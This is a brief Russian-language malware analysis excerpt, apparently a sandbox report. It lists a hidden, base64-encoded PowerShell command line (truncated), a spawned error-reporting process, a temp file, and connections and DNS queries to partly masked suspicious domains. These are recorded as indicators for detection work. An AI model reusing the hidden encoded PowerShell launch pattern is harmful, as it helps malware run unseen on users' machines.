Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABSAHIAZQB0AHIAYgBkAG0AbgB6AG8APQAnAEgAeABpAG8AZgBpAGEAawB1ACcAOwAkAEMAZAB5AGEAYgBvAHIAawB3AGkAcwB0ACAAPQAgACcANwA4ADQAJwA7ACQAQQB4AHEAbwBwAHAAagBkAGYAcABqAD0...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1452
- %TEMP%\1005925.cvr
- 'hi###obile.com':443
- 'nh###amkiv.com':443
- 'hi###obile.com':443
- DNS ASK hi###obile.com
- DNS ASK mu###melhaq.com
- DNS ASK pr#####online360.com
- DNS ASK ro####dslaws.com
- DNS ASK nh###amkiv.com